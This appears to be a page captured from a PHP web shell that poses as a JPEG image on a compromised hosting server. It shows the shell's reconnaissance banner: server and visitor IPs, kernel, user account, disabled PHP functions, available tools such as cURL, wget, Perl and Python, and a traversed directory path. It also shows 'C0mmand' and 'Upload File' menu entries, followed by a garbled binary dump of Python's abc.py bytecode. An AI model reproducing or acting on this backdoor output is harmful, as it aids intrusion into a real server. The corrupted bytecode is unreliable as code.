����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.219.7.43 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/../lib64/sasl2/../python3.11/tomllib/../__pycache__/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
� �=Og� � � � d Z d� Z G d� de� � Z G d� de� � Z G d� de� � Z dd lm Z m Z mZmZm Z mZmZmZ G d � de� � Zn# e$ r ddlmZm Z d e_ Y nw xY wd� Z G d� de�� � ZdS )z3Abstract Base Classes (ABCs) according to PEP 3119.c � � d| _ | S )aI A decorator indicating abstract methods. Requires that the metaclass is ABCMeta or derived from it. A class that has a metaclass derived from ABCMeta cannot be instantiated unless all of its abstract methods are overridden. The abstract methods can be called using any of the normal 'super' call mechanisms. abstractmethod() may be used to declare abstract methods for properties and descriptors. Usage: class C(metaclass=ABCMeta): @abstractmethod def my_abstract_method(self, arg1, arg2, argN): ... T)�__isabstractmethod__)�funcobjs �/usr/lib64/python3.11/abc.py�abstractmethodr s � �"